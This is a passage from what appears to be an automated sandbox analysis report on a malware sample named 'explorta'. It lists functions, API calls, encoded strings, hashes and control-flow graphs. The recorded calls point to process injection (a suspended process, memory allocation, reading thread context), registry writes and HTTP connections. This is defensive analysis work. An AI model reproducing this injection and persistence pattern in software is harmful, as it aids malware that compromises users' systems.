                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                                                                                                                                                                                                                                          • String ID: 0TI3$0TY3$0ik3$1C03$246122658369$3c5ff2$Ks==$Py4vHy==$RCM+$RCQ+$cSQ3$dDY3$dYc3$dZM3$eCM3$eYQ3$eZQ68u==$ef0=$fS43$fjM3$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 3545240790-3557771482
                                                                                                                                                                                                                                          • Opcode ID: fa0f1756ea0bd68225b320751789defc8718dc7dd854a3f7452d50bd9685dc8d
                                                                                                                                                                                                                                          • Instruction ID: b1f32a076063e8d23406b01ebbea1f0003c51f692010f212b2744040eae64660
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0f1756ea0bd68225b320751789defc8718dc7dd854a3f7452d50bd9685dc8d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6723F671A001588BEF19DB28CD8979DBFB6BB96304F5481D8E009AB2C2EB755F84CF51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00596A70 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 185processmemorythreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00596C15
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00596CAB
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00596CC4
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00596CD9
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?, ,?,00000004,00000000), ref: 00596CF9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$AllocContextCreateMemoryReadThreadVirtualWow64Xinvalid_argumentstd::_
                                                                                                                                                                                                                                          • String ID: $VUUU$invalid stoi argument
                                                                                                                                                                                                                                          • API String ID: 3950861772-3954507777
                                                                                                                                                                                                                                          • Opcode ID: e23bbeb4d513abc0cd79db5800393a35404621f8f22a4f5a8bd3a9e55c483ab7
                                                                                                                                                                                                                                          • Instruction ID: 7617ad8b2a814ab4a43b20997dd566e7bbf65a279744de322402ff39aed7f7e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e23bbeb4d513abc0cd79db5800393a35404621f8f22a4f5a8bd3a9e55c483ab7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A251DA71644305AFD720AB64CC0AF5FBBE9BF84704F500519F644A72D1EBB4A904CB96
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005978B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1027 5978b0-597932 call 5c38d0 1031 597938-597960 call 5a71e0 call 595d40 1027->1031 1032 597e1a-597e37 call 5ac7d1 1027->1032 1039 597962 1031->1039 1040 597964-597986 call 5a71e0 call 595d40 1031->1040 1039->1040 1045 597988 1040->1045 1046 59798a-5979a3 1040->1046 1045->1046 1049 5979a5-5979b4 1046->1049 1050 5979d4-5979ff 1046->1050 1051 5979ca-5979d1 call 5ace48 1049->1051 1052 5979b6-5979c4 1049->1052 1053 597a01-597a10 1050->1053 1054 597a30-597a51 1050->1054 1051->1050 1052->1051 1055 597e38 call 5c644a 1052->1055 1057 597a12-597a20 1053->1057 1058 597a26-597a2d call 5ace48 1053->1058 1059 597a53-597a55 GetNativeSystemInfo 1054->1059 1060 597a57-597a5c 1054->1060 1068 597e3d-597e42 call 5c644a 1055->1068 1057->1055 1057->1058 1058->1054 1064 597a5d-597a66 1059->1064 1060->1064 1066 597a68-597a6f 1064->1066 1067 597a84-597a87 1064->1067 1070 597e15 1066->1070 1071 597a75-597a7f 1066->1071 1072 597dbb-597dbe 1067->1072 1073 597a8d-597a96 1067->1073 1070->1032 1075 597e10 1071->1075 1072->1070 1078 597dc0-597dc9 1072->1078 1076 597aa9-597aac 1073->1076 1077 597a98-597aa4 1073->1077 1075->1070 1080 597d98-597d9a 1076->1080 1081 597ab2-597ab9 1076->1081 1077->1075 1082 597dcb-597dcf 1078->1082 1083 597df0-597df3 1078->1083 1084 597da8-597dab 1080->1084 1085 597d9c-597da6 1080->1085 1086 597abf-597b16 call 5a71e0 call 595d40 call 5a71e0 call 595d40 call 595e90 1081->1086 1087 597b94-597d81 call 5a71e0 call 595d40 call 5a71e0 call 595d40 call 595e90 call 5a71e0 call 595d40 call 595860 call 5a71e0 call 595d40 call 5a71e0 call 595d40 call 595e90 call 5a71e0 call 595d40 call 595860 call 5a71e0 call 595d40 call 5a71e0 call 595d40 call 595e90 call 5a71e0 call 595d40 call 595860 1081->1087 1088 597dd1-597dd6 1082->1088 1089 597de4-597dee 1082->1089 1090 597e01-597e0d 1083->1090 1091 597df5-597dff 1083->1091 1084->1070 1093 597dad-597db9 1084->1093 1085->1075 1112 597b1b-597b22 1086->1112 1127 597d87-597d90 1087->1127 1088->1089 1095 597dd8-597de2 1088->1095 1089->1070 1090->1075 1091->1070 1093->1075 1095->1070 1114 597b24 1112->1114 1115 597b26-597b46 call 5c8331 1112->1115 1114->1115 1121 597b48-597b57 1115->1121 1122 597b7d-597b7f 1115->1122 1124 597b59-597b67 1121->1124 1125 597b6d-597b7a call 5ace48 1121->1125 1126 597b85-597b8f 1122->1126 1122->1127 1124->1068 1124->1125 1125->1122 1126->1127 1127->1072 1130 597d92 1127->1130 1130->1080
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 00597A53
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID: OfAuIe==$OfAuJO==$OfAvHe==
                                                                                                                                                                                                                                          • API String ID: 1721193555-782918887
                                                                                                                                                                                                                                          • Opcode ID: 27891a0884f868432ac913f5b2c4b58352d09ed0c1a1a91b10b852c5066c9c66
                                                                                                                                                                                                                                          • Instruction ID: 72f531da9142a573b3685b7bf812d66338583b580f241ae5f3d4e96085dac63c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27891a0884f868432ac913f5b2c4b58352d09ed0c1a1a91b10b852c5066c9c66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED1D571E142089BDF15BB28CD4A7AD7E61BB86310F544289E415AB3C2EB754F94CBC2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005C66B1 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1165 5c66b1-5c66e6 GetFileType 1166 5c66ec-5c66f7 1165->1166 1167 5c679e-5c67a1 1165->1167 1170 5c6719-5c6735 call 5c38d0 GetFileInformationByHandle 1166->1170 1171 5c66f9-5c670a call 5c6a27 1166->1171 1168 5c67ca-5c67f2 1167->1168 1169 5c67a3-5c67a6 1167->1169 1174 5c680f-5c6811 1168->1174 1175 5c67f4-5c6807 1168->1175 1169->1168 1172 5c67a8-5c67aa 1169->1172 1179 5c67bb-5c67c8 call 5c6cbd 1170->1179 1184 5c673b-5c677d call 5c6979 call 5c6821 * 3 1170->1184 1186 5c67b7-5c67b9 1171->1186 1187 5c6710-5c6717 1171->1187 1178 5c67ac-5c67b1 call 5c6cf3 1172->1178 1172->1179 1177 5c6812-5c6820 call 5ac7d1 1174->1177 1175->1174 1192 5c6809-5c680c 1175->1192 1178->1186 1179->1186 1201 5c6782-5c679a call 5c6946 1184->1201 1186->1177 1187->1170 1192->1174 1201->1174 1204 5c679c 1201->1204 1204->1186
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 005C66D3
                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNELBASE(?,?), ref: 005C672D
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 005C67C2
                                                                                                                                                                                                                                            • Part of subcall function 005C6A27: __dosmaperr.LIBCMT ref: 005C6A5C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2531987475-0
                                                                                                                                                                                                                                          • Opcode ID: f8a465f7f79221aa35a6ee80a2a5fe78de8084e1a083431b95e3dc55fe2e00eb
                                                                                                                                                                                                                                          • Instruction ID: af2815e70206944e7a8180b755ee51dc1922b77c724852d3c5adc49bcb59f984
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8a465f7f79221aa35a6ee80a2a5fe78de8084e1a083431b95e3dc55fe2e00eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01415AB5900205AFDB24DFB5D845EAFBBF9FF88304B10482DE856D3211EA309A44CB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00595E90 Relevance: 4.6, APIs: 3, Instructions: 134registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1205 595e90-595f15 call 5c38d0 RegOpenKeyExA 1208 595f41-595f64 RegCloseKey 1205->1208 1209 595f17-595f40 RegQueryValueExA 1205->1209 1210 595f67-595f6c 1208->1210 1209->1208 1210->1210 1211 595f6e-595f85 call 5a78a0 1210->1211 1214 595faf-595fc7 1211->1214 1215 595f87-595f93 1211->1215 1218 595fc9-595fd5 1214->1218 1219 595ff1-59600c call 5ac7d1 1214->1219 1216 595fa5-595fac call 5ace48 1215->1216 1217 595f95-595fa3 1215->1217 1216->1214 1217->1216 1220 59600d-596012 call 5c644a 1217->1220 1222 595fe7-595fee call 5ace48 1218->1222 1223 595fd7-595fe5 1218->1223 1222->1219 1223->1220 1223->1222
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00595F0D
                                                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 00595F3B
                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 00595F47
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                          • Opcode ID: a10b453680bd78aba0db8d9dfbe6dd46729d65bd4f1ff4b240d4d6208f230eef
                                                                                                                                                                                                                                          • Instruction ID: 5fab4c0ba0995c2d9a2009350f276b45e316cbec88df0788f6fed318f6da4a93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a10b453680bd78aba0db8d9dfbe6dd46729d65bd4f1ff4b240d4d6208f230eef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741F4B16001089FEF29CF28CC49BED7BB9FB45314F1081ADF91597681E7759A84CB94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00596020 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1352 596020-59605b RegOpenKeyExA 1353 59605d-596086 RegSetValueExA 1352->1353 1354 596087-596096 1352->1354 1353->1354 1356 596098-5960a4 1354->1356 1357 5960c4-5960dc 1354->1357 1360 5960ba-5960c1 call 5ace48 1356->1360 1361 5960a6-5960b4 1356->1361 1358 5960de-5960ea 1357->1358 1359 596106-59611e 1357->1359 1362 5960fc-596103 call 5ace48 1358->1362 1363 5960ec-5960fa 1358->1363 1364 596148-596155 call 5ac7d1 1359->1364 1365 596120-59612c 1359->1365 1360->1357 1361->1360 1366 596156-59615b call 5c644a 1361->1366 1362->1359 1363->1362 1363->1366 1371 59613e-596145 call 5ace48 1365->1371 1372 59612e-59613c 1365->1372 1371->1364 1372->1366 1372->1371
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,000F003F,?), ref: 00596053
                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(80000001,?,00000000,00000002,?,?), ref: 00596081
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: OpenValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3130442925-0
                                                                                                                                                                                                                                          • Opcode ID: 15ce590e69bbc84a04e7a66b566e2845944420324b67d7e9971291affdeff16b
                                                                                                                                                                                                                                          • Instruction ID: 0050e79ac0384f23b0afd982cb5c56f4f3b840a4d939918b19723f6a324d5cb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15ce590e69bbc84a04e7a66b566e2845944420324b67d7e9971291affdeff16b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4331CF71210148AFEF18DF28CD89BAD7F66FF85340FA08218F90597296D73AD984CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005C6549 Relevance: 3.1, APIs: 2, Instructions: 89COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1379 5c6549-5c6555 1380 5c6574-5c6598 call 5c38d0 1379->1380 1381 5c6557-5c6573 call 5c6ce0 call 5c6cf3 call 5c643a 1379->1381 1387 5c659a-5c65b4 call 5c6ce0 call 5c6cf3 call 5c643a 1380->1387 1388 5c65b6-5c65d8 CreateFileW 1380->1388 1411 5c6622-5c6626 1387->1411 1391 5c65e8-5c65ef call 5c6627 1388->1391 1392 5c65da-5c65de call 5c66b1 1388->1392 1401 5c65f0-5c65f2 1391->1401 1397 5c65e3-5c65e6 1392->1397 1397->1401 1403 5c6614-5c6617 1401->1403 1404 5c65f4-5c6611 call 5c38d0 1401->1404 1407 5c6619-5c661f FindCloseChangeNotification 1403->1407 1408 5c6620 1403->1408 1404->1403 1407->1408 1408->1411
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0780e590c234974346c52d5b20da5fd0e918c54b4e2327d4d0518c38186148e4
                                                                                                                                                                                                                                          • Instruction ID: 2a148d9c4d3855c7da91d2d7d455684af5e2c7765a71f38ffea71dc5568b2a00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0780e590c234974346c52d5b20da5fd0e918c54b4e2327d4d0518c38186148e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E21B8729411097EDB116BE49C49F9E7F29FF82374F200219F9642B1C1D7709F0596A1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005CCDA4 Relevance: 1.7, APIs: 1, Instructions: 198COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
